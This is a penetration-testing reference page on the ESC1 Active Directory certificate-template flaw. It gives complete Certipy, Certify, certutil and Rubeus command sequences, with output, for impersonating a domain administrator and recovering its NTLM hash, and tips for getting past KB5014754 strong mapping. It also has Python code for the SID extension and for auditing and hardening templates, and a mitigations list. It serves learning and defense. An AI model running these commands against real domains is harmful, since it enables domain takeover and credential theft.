ESC1
Description
ESC1 is a privilege escalation vulnerability in certificate templates. When a template lets the enrollee supply the subject, any principal with enrollment rights can request a certificate whose subjectAltName (SAN) names a different user or machine in Active Directory, for example the UPN of a Domain Admin. The Certificate Authority (CA) issues the certificate for that SAN, and the requester can then authenticate to the domain (e.g. via Kerberos PKINIT) as the targeted account.
Requirements for attack path
ENROLLEE_SUPPLIES_SUBJECT flag set in the certificate template (msPKI-Certificate-Name-Flag)
Enrollment rights granted to a user or group we control (for example Domain Users or Authenticated Users)
Manager approval not enabled
Authorized signatures not required (msPKI-RA-Signature is 0)
The template's EKU allows client authentication (Client Authentication, Smart Card Logon, PKINIT Client Authentication, Any Purpose, or no EKU at all) and the template is published on an enterprise CA
Linux
Enumeration
certipy find -u 'Moe@Security.local' -p 'Password123' -dc-ip 10.10.10.100 -vulnerable -stdout

Performing the attack
certipy req -u 'moe@security.local' -p 'Password123' -dc-ip 10.10.10.100 -ca 'SECURITY-CA-CA' -target-ip 10.10.10.2 -template 'ESC1' -upn 'administrator@security.local' -sid S-1-5-21-13999771-2333344039-1820745628-500
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 51
[*] Got certificate with UPN 'administrator@security.local'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-500'
[*] Saved certificate and private key to 'administrator.pfx'
certipy auth -pfx administrator.pfx -username 'administrator' -domain 'security.local' -dc-ip 10.10.10.100
[*] Using principal: administrator@security.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@security.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe
Windows
Enumeration
.\Certify.exe find /vulnerable /enabled /enrolleeSuppliesSubject

Performing the attack
Request a certificate from the template vulnerable to ESC1 and specify a SAN for the user we wish to compromise (/altname:).
Also pass /sid: with the objectSid of the targeted account (the SID of administrator@security.local in the example below). Since KB5014754 the CA embeds this SID in the certificate's szOID_NTDS_CA_SECURITY_EXT extension, and domain controllers in Full Enforcement mode reject certificates that cannot be strongly mapped to the account, so a request made with /altname alone can fail with a certificate mismatch error at authentication time.
.\Certify.exe request /ca:CA.SECURITY.LOCAL\SECURITY-CA-CA /template:ESC1 /altname:security\Administrator /sid:S-1-5-21-13999771-2333344039-1820745628-500
Take the private key and certificate from the output and save them to separate files that share a base name, for example cert.key and cert.cer, since certutil pairs a .cer file with the .key file of the same name.
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAzyqzlf9NI2sbkAAiJ
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGeDCCBWCgAwIBAgITIwAAAFhhlVOMQ7
-----END CERTIFICATE-----
Then merge them with certutil into the .pfx file used in the Rubeus commands below.
certutil -MergePFX .\cert.cer .\admin.pfx
Use the resulting .pfx with Rubeus to request a Kerberos TGT as the target; with /getcredentials Rubeus additionally performs a U2U request and recovers the account's NTLM hash from the PAC.
# Get NTLM Hash
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /getcredentials
# Get TGT
.\Rubeus.exe asktgt /user:security\Administrator /certificate:admin.pfx /nowrap
< -- Snip -->
ServiceName : krbtgt/security
ServiceRealm : SECURITY.LOCAL
UserName : Administrator (NT_PRINCIPAL)
UserRealm : SECURITY.LOCAL
StartTime : 05/03/2025 18:06:36
EndTime : 06/03/2025 04:06:36
RenewTill : 12/03/2025 18:06:36
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : CpuuZvtyqrp9XO0V1OL/kg==
ASREP (key) : E7A981462C4B5115AB41BE5540D573E6
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 2B576ACBE6BCFDA7294D6BD18041B8FE
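The /sid note above can be made concrete. The following is an added example in Python (not code from the original page, Certify or Certipy) that builds the szOID_NTDS_CA_SECURITY_EXT extension value the CA embeds for a given SID, parses it back, and classifies a certificate's mapping the way a DC in Full Enforcement mode would. The DER layout is hand-encoded with the standard library only; the extension tables passed to mapping_strength are constructed stand-ins for a parsed certificate, and the second SID is hypothetical.

```python
# What Certify's /sid and Certipy's -sid put into the certificate: the
# szOID_NTDS_CA_SECURITY_EXT extension (OID 1.3.6.1.4.1.311.25.2) carrying the
# target account's objectSid, which the KDC uses for strong certificate mapping
# after KB5014754. Added example, not code from the original page, Certify or
# Certipy; the DER structure is hand-encoded with the standard library only.
from typing import Dict, Optional, Tuple

SID_EXTENSION_OID = "1.3.6.1.4.1.311.25.2"
# DER content octets of OID 1.3.6.1.4.1.311.25.2.1 (szOID_NTDS_OBJECTSID)
NTDS_OBJECTSID_OID_DER = bytes.fromhex("2b060104018237190201")


def der_len(n: int) -> bytes:
    """DER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_tlv(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + der_len(len(content)) + content


def encode_sid_extension(sid: str) -> bytes:
    """extnValue of szOID_NTDS_CA_SECURITY_EXT:
         SEQUENCE {
           [0] {                                  -- OtherName
             OBJECT IDENTIFIER 1.3.6.1.4.1.311.25.2.1
             [0] { OCTET STRING "S-1-5-21-..." }  -- EXPLICIT value
           }
         }
    """
    if not sid.upper().startswith("S-1-"):
        raise ValueError("expected a string SID")
    oid = der_tlv(0x06, NTDS_OBJECTSID_OID_DER)
    value = der_tlv(0xA0, der_tlv(0x04, sid.encode("ascii")))
    other_name = der_tlv(0xA0, oid + value)
    return der_tlv(0x30, other_name)


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Parse one DER TLV at pos; return (tag, content, position after it)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    length = first
    if first & 0x80:
        nbytes = first & 0x7F
        if nbytes == 0 or nbytes > 4:
            raise ValueError("unsupported DER length")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > len(buf):
        raise ValueError("truncated DER")
    return tag, buf[pos:pos + length], pos + length


def decode_sid_extension(der: bytes) -> Optional[str]:
    """Return the SID carried by the extension, or None if the bytes are not an
    NTDS OtherName (wrong OID, wrong tags, or malformed DER)."""
    try:
        tag, seq, _ = _read_tlv(der, 0)
        if tag != 0x30:
            return None
        tag, other, _ = _read_tlv(seq, 0)
        if tag != 0xA0:
            return None
        tag, oid, pos = _read_tlv(other, 0)
        if tag != 0x06 or oid != NTDS_OBJECTSID_OID_DER:
            return None
        tag, explicit, _ = _read_tlv(other, pos)
        if tag != 0xA0:
            return None
        tag, sid, _ = _read_tlv(explicit, 0)
        if tag != 0x04:
            return None
        return sid.decode("ascii")
    except (IndexError, ValueError, UnicodeDecodeError):
        return None


def mapping_strength(extensions: Dict[str, bytes], account_sid: str) -> str:
    """Simplified KDC view under KB5014754 Full Enforcement:
         'strong'   - SID extension present and equal to the account's objectSid
         'mismatch' - SID extension names a different account
         'weak'     - no usable SID extension; SAN/UPN-only mapping, rejected unless
                      the account carries an explicit strong altSecurityIdentities entry
    """
    ext = extensions.get(SID_EXTENSION_OID)
    cert_sid = decode_sid_extension(ext) if ext is not None else None
    if cert_sid is None:
        return "weak"
    return "strong" if cert_sid.upper() == account_sid.upper() else "mismatch"


# Constructed demo using the SID from the request above; the extension maps are
# stand-ins for a parsed certificate's extension table.
TARGET_SID = "S-1-5-21-13999771-2333344039-1820745628-500"
OTHER_SID = "S-1-5-21-13999771-2333344039-1820745628-1105"  # hypothetical user


def demo() -> Dict[str, str]:
    with_sid = {SID_EXTENSION_OID: encode_sid_extension(TARGET_SID)}
    without_sid: Dict[str, bytes] = {}  # request made with /altname only
    return {
        "with_sid": mapping_strength(with_sid, TARGET_SID),
        "without_sid": mapping_strength(without_sid, TARGET_SID),
        "wrong_account": mapping_strength(with_sid, OTHER_SID),
    }


if __name__ == "__main__":
    print(encode_sid_extension(TARGET_SID).hex())
    print(demo())
```

The "Certificate object SID is ..." line in the Certipy output above is this extension being read back from the issued certificate; a certificate requested without the SID is the "weak" case, which is why the request should always carry it.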
Mitigations
Remove the ENROLLEE_SUPPLIES_SUBJECT flag from the certificate template
Require manager approval on the template
Require authorized signatures
Remove weak enrollment permissions (e.g. Domain Users, Authenticated Users) from the template
Revoke certificates already issued from the template, since changing the template does not invalidate them
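The requirements listed at the top of the page and the mitigations above can be checked and applied mechanically. The following is an added example in Python (not code from the original page, Certipy or Certify) that evaluates a template's LDAP attributes (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage) plus an already-resolved list of principals holding the Enroll right against the ESC1 conditions, and returns the hardened attribute values. The sample templates are constructed for the example; the enroll_principals key and the list of low-privileged group names are assumptions about how the caller resolves the template ACL.

```python
# Audit certificate-template attributes for the ESC1 conditions and compute the
# hardened attribute values. Added example, not code from the original page or
# from Certipy/Certify. Input is a dict of LDAP attribute values as read from
# CN=Certificate Templates,CN=Public Key Services,...; the sample templates
# below are constructed for the example.
from typing import Dict, List

# Bit flags and OIDs from the certificate template schema (MS-CRTD)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag (manager approval)

CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "2.5.29.37.0",              # Any Purpose
}

# Principals whose Enroll right makes a template reachable by any domain member.
# Assumption for the example: the caller resolves the template ACL into these names.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}


def allows_client_auth(ekus: List[str]) -> bool:
    """No EKU at all means 'all purposes', which includes client authentication."""
    return not ekus or bool(set(ekus) & CLIENT_AUTH_EKUS)


def esc1_findings(t: Dict) -> List[str]:
    """The ESC1 conditions this template meets; all five together mean vulnerable."""
    findings = []
    if t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("ENROLLEE_SUPPLIES_SUBJECT set")
    if not (t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS):
        findings.append("manager approval not required")
    if t["msPKI-RA-Signature"] == 0:
        findings.append("no authorized signatures required")
    if allows_client_auth(t["pKIExtendedKeyUsage"]):
        findings.append("EKU allows client authentication")
    weak = set(t["enroll_principals"]) & LOW_PRIV_PRINCIPALS
    if weak:
        findings.append("enrollment rights for " + ", ".join(sorted(weak)))
    return findings


def is_esc1(t: Dict) -> bool:
    return len(esc1_findings(t)) == 5


def audit(templates: Dict[str, Dict]) -> List[str]:
    """Names of the templates that meet every ESC1 condition."""
    return sorted(name for name, t in templates.items() if is_esc1(t))


def harden(t: Dict) -> Dict:
    """Apply the mitigations without touching the input: clear the subject flag,
    require manager approval, require one RA signature, and drop the Enroll right
    of low-privileged groups. Already-issued certificates still need revoking."""
    h = dict(t)
    h["msPKI-Certificate-Name-Flag"] &= ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    h["msPKI-Enrollment-Flag"] |= CT_FLAG_PEND_ALL_REQUESTS
    h["msPKI-RA-Signature"] = max(1, t["msPKI-RA-Signature"])
    h["enroll_principals"] = [p for p in t["enroll_principals"] if p not in LOW_PRIV_PRINCIPALS]
    return h


# Constructed sample templates; attribute values are illustrative, not from a real domain.
SAMPLE_TEMPLATES = {
    "ESC1": {                      # every condition met
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "msPKI-Enrollment-Flag": 0x00000000,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll_principals": ["Domain Users", "Domain Admins"],
    },
    "WebServer": {                 # enrollee supplies subject, but Server Authentication only
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "msPKI-Enrollment-Flag": 0x00000000,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
        "enroll_principals": ["Domain Admins"],
    },
    "User": {                      # subject built from AD, not supplied by the requester
        "msPKI-Certificate-Name-Flag": 0xA6000000,
        "msPKI-Enrollment-Flag": 0x00000029,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4"],
        "enroll_principals": ["Domain Users"],
    },
}

if __name__ == "__main__":
    for name in audit(SAMPLE_TEMPLATES):
        print(name, esc1_findings(SAMPLE_TEMPLATES[name]))
        print("after hardening:", esc1_findings(harden(SAMPLE_TEMPLATES[name])))
```

Note that a template with ENROLLEE_SUPPLIES_SUBJECT but no client-authentication EKU (the WebServer sample) is not ESC1 on its own, and that hardening leaves the client-authentication EKU in place: the template stays usable for legitimate logon certificates, it just no longer lets the enrollee choose who the certificate is for.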